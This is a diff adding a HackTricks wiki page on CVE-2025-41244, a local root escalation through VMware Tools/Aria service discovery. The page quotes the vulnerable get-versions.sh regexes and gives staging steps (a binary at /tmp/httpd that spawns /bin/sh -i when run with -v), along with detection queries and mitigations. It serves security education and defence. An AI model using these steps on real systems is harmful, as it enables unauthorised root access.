Merge pull request #1451 from HackTricks-wiki/update_You_name_it__VMware_elevates_it__CVE-2025-41244__20251001_013105

You name it, VMware elevates it (CVE-2025-41244)

src/SUMMARY.md

@@ -110,6 +110,7 @@
 - [Checklist - Linux Privilege Escalation](linux-hardening/linux-privilege-escalation-checklist.md)
 - [Linux Privilege Escalation](linux-hardening/privilege-escalation/README.md)
   - [Android Rooting Frameworks Manager Auth Bypass Syscall Hook](linux-hardening/privilege-escalation/android-rooting-frameworks-manager-auth-bypass-syscall-hook.md)
+  - [Vmware Tools Service Discovery Untrusted Search Path Cve 2025 41244](linux-hardening/privilege-escalation/vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md)
   - [Arbitrary File Write to Root](linux-hardening/privilege-escalation/write-to-root.md)
   - [Cisco - vmanage](linux-hardening/privilege-escalation/cisco-vmanage.md)
   - [Containerd (ctr) Privilege Escalation](linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md)

src/linux-hardening/privilege-escalation/README.md

@@ -1723,6 +1723,16 @@ Android rooting frameworks commonly hook a syscall to expose privileged kernel f
 android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
 {{#endref}}
 
+## VMware Tools service discovery LPE (CWE-426) via regex-based exec (CVE-2025-41244)
+
+Regex-driven service discovery in VMware Tools/Aria Operations can extract a binary path from process command lines and execute it with -v under a privileged context. Permissive patterns (e.g., using \S) may match attacker-staged listeners in writable locations (e.g., /tmp/httpd), leading to execution as root (CWE-426 Untrusted Search Path).
+
+Learn more and see a generalized pattern applicable to other discovery/monitoring stacks here:
+
+{{#ref}}
+vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md
+{{#endref}}
+
 ## Kernel Security Protections
 
 - [https://github.com/a13xp0p0v/kconfig-hardened-check](https://github.com/a13xp0p0v/kconfig-hardened-check)
@@ -1774,4 +1784,6 @@ android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
 - [GNU Bash Manual – BASH_ENV (non-interactive startup file)](https://www.gnu.org/software/bash/manual/bash.html#index-BASH_005fENV)
 - [0xdf – HTB Environment (sudo env_keep BASH_ENV → root)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
 
+- [NVISO – You name it, VMware elevates it (CVE-2025-41244)](https://blog.nviso.eu/2025/09/29/you-name-it-vmware-elevates-it-cve-2025-41244/)
+
 {{#include ../../banners/hacktricks-training.md}}

src/linux-hardening/privilege-escalation/vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md

@@ -0,0 +1,153 @@
+# VMware Tools service discovery LPE (CWE-426) via regex-based binary discovery (CVE-2025-41244)
+
+{{#include ../../banners/hacktricks-training.md}}
+
+This technique abuses regex-driven service discovery pipelines that parse running process command lines to infer service versions and then execute a candidate binary with a "version" flag. When permissive patterns accept untrusted, attacker-controlled paths (e.g., /tmp/httpd), the privileged collector executes an arbitrary binary from an untrusted location, yielding local privilege escalation. NVISO documented this in VMware Tools/Aria Operations Service Discovery as CVE-2025-41244.
+
+- Impact: Local privilege escalation to root (or to the privileged discovery account)
+- Root cause: Untrusted Search Path (CWE-426) + permissive regex matching of process command lines
+- Affected: open-vm-tools/VMware Tools on Linux (credential-less discovery), VMware Aria Operations SDMP (credential-based discovery via Tools/proxy)
+
+## How VMware service discovery works (high level)
+
+- Credential-based (legacy): Aria executes discovery scripts inside the guest via VMware Tools using configured privileged credentials.
+- Credential-less (modern): Discovery logic runs within VMware Tools, already privileged in the guest.
+
+Both modes ultimately run shell logic that scans processes with listening sockets, extracts a matching command path via a regex, and executes the first argv token with a version flag.
+
+## Root cause and vulnerable pattern (open-vm-tools)
+
+In open-vm-tools, the serviceDiscovery plugin script get-versions.sh matches candidate binaries using broad regular expressions and executes the first token without any trusted-path validation:
+
+```bash
+get_version() {
+  PATTERN=$1
+  VERSION_OPTION=$2
+  for p in $space_separated_pids
+  do
+    COMMAND=$(get_command_line $p | grep -Eo "$PATTERN")
+    [ ! -z "$COMMAND" ] && echo VERSIONSTART "$p" "$("${COMMAND%%[[:space:]]*}" $VERSION_OPTION 2>&1)" VERSIONEND
+  done
+}
+```
+
+It is invoked with permissive patterns containing \S (non-whitespace) that will happily match non-system paths in user-writable locations:
+
+```bash
+get_version "/\S+/(httpd-prefork|httpd|httpd2-prefork)($|\s)" -v
+get_version "/usr/(bin|sbin)/apache\S*" -v
+get_version "/\S+/mysqld($|\s)" -V
+get_version "\.?/\S*nginx($|\s)" -v
+get_version "/\S+/srm/bin/vmware-dr($|\s)" --version
+get_version "/\S+/dataserver($|\s)" -v
+```
+
+- Extraction uses grep -Eo and takes the first token: ${COMMAND%%[[:space:]]*}
+- No whitelist/allowlist of trusted system paths; any discovered listener with a matching name is executed with -v/--version
+
+This creates an untrusted search path execution primitive: arbitrary binaries located in world-writable directories (e.g., /tmp/httpd) get executed by a privileged component.
+
+## Exploitation (both credential-less and credential-based modes)
+
+Preconditions
+- You can run an unprivileged process that opens a listening socket on the guest.
+- The discovery job is enabled and runs periodically (historically ~5 minutes).
+
+Steps
+1) Stage a binary in a path matching one of the permissive regexes, e.g. /tmp/httpd or ./nginx
+2) Run it as a low-privileged user and ensure it opens any listening socket
+3) Wait for the discovery cycle; the privileged collector will automatically execute: /tmp/httpd -v (or similar), running your program as root
+
+Minimal demo (using NVISO’s approach)
+```bash
+# Build any small helper that:
+#  - default mode: opens a dummy TCP listener
+#  - when called with -v/--version: performs the privileged action (e.g., connect to an abstract UNIX socket and spawn /bin/sh -i)
+# Example staging and trigger
+cp your_helper /tmp/httpd
+chmod +x /tmp/httpd
+/tmp/httpd          # run as low-priv user and wait for the cycle
+# After the next cycle, expect a root shell or your privileged action
+```
+
+Typical process lineage
+- Credential-based: /usr/bin/vmtoolsd -> /bin/sh /tmp/VMware-SDMP-Scripts-.../script_...sh -> /tmp/httpd -v -> /bin/sh -i
+- Credential-less: /bin/sh .../get-versions.sh -> /tmp/httpd -v -> /bin/sh -i
+
+Artifacts (credential-based)
+Recovered SDMP wrapper scripts under /tmp/VMware-SDMP-Scripts-{UUID}/ may show direct execution of the rogue path:
+```bash
+/tmp/httpd -v >"/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stdout" 2>"/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stderr"
+```
+
+## Generalizing the technique: regex-driven discovery abuse (portable pattern)
+
+Many agents and monitoring suites implement version/service discovery by:
+- Enumerating processes with listening sockets
+- Grepping argv/command lines with permissive regexes (e.g., patterns containing \S)
+- Executing the matched path with a benign flag like -v, --version, -V, -h
+
+If the regex accepts untrusted paths and the path is executed from a privileged context, you get CWE-426 Untrusted Search Path execution.
+
+Abuse recipe
+- Name your binary like common daemons that the regex is likely to match: httpd, nginx, mysqld, dataserver
+- Place it in a writable directory: /tmp/httpd, ./nginx
+- Ensure it matches the regex and opens any port to be enumerated
+- Wait for the scheduled collector; you get an automatic privileged invocation of <path> -v
+
+Masquerading note: This aligns with MITRE ATT&CK T1036.005 (Match Legitimate Name or Location) to increase match probability and stealth.
+
+Reusable privileged I/O relay trick
+- Build your helper so that on privileged invocation (-v/--version) it connects to a known rendezvous (e.g., a Linux abstract UNIX socket like @cve) and bridges stdio to /bin/sh -i. This avoids on-disk artifacts and works across many environments where the same binary is re-invoked with a flag.
+
+## Detection and DFIR guidance
+
+Hunting queries
+- Uncommon children of vmtoolsd or get-versions.sh such as /tmp/httpd, ./nginx, /tmp/mysqld
+- Any execution of non-system absolute paths by discovery scripts (look for spaces in ${COMMAND%%...} expansions)
+- ps -ef --forest to visualize ancestry trees: vmtoolsd -> get-versions.sh -> <non-system path>
+
+On Aria SDMP (credential-based)
+- Inspect /tmp/VMware-SDMP-Scripts-{UUID}/ for transient scripts and stdout/stderr artifacts showing execution of attacker paths
+
+Policy/telemetry
+- Alert when privileged collectors execute from non-system prefixes: ^/(tmp|home|var/tmp|dev/shm)/
+- File integrity monitoring on get-versions.sh and VMware Tools plugins
+
+## Mitigations
+
+- Patch: Apply Broadcom/VMware updates for CVE-2025-41244 (Tools and Aria Operations SDMP)
+- Disable or restrict credential-less discovery where feasible
+- Validate trusted paths: restrict execution to allowlisted directories (/usr/sbin, /usr/bin, /sbin, /bin) and only exact known binaries
+- Avoid permissive regexes with \S; prefer anchored, explicit absolute paths and exact command names
+- Drop privileges for discovery helpers where possible; sandbox (seccomp/AppArmor) to reduce impact
+- Monitor for and alert on vmtoolsd/get-versions.sh executing non-system paths
+
+## Notes for defenders and implementers
+
+Safer matching and execution pattern
+```bash
+# Bad: permissive regex and blind exec
+COMMAND=$(get_command_line "$pid" | grep -Eo "/\\S+/nginx(\$|\\s)")
+[ -n "$COMMAND" ] && "${COMMAND%%[[:space:]]*}" -v
+
+# Good: strict allowlist + path checks
+candidate=$(get_command_line "$pid" | awk '{print $1}')
+case "$candidate" in
+  /usr/sbin/nginx|/usr/sbin/httpd|/usr/sbin/apache2)
+      "$candidate" -v 2>&1 ;;
+  *)
+      : # ignore non-allowlisted paths
+      ;;
+esac
+```
+
+## References
+
+- [NVISO – You name it, VMware elevates it (CVE-2025-41244)](https://blog.nviso.eu/2025/09/29/you-name-it-vmware-elevates-it-cve-2025-41244/)
+- [Broadcom advisory for CVE-2025-41244](https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36149)
+- [open-vm-tools – serviceDiscovery/get-versions.sh (stable-13.0.0)](https://github.com/vmware/open-vm-tools/blob/stable-13.0.0/open-vm-tools/services/plugins/serviceDiscovery/get-versions.sh)
+- [MITRE ATT&CK T1036.005 – Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005/)
+- [CWE-426: Untrusted Search Path](https://cwe.mitre.org/data/definitions/426.html)
+
+{{#include ../../banners/hacktricks-training.md}}

src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md

@@ -20,6 +20,15 @@ msf> auxiliary/scanner/vmware/vmware_http_login
 If you find valid credentials, you can use more metasploit scanner modules to obtain information.
 
 
+
+### See also
+
+Linux LPE via VMware Tools service discovery (CWE-426 / CVE-2025-41244):
+
+{{#ref}}
+../../linux-hardening/privilege-escalation/vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md
+{{#endref}}
+
 {{#include ../../banners/hacktricks-training.md}}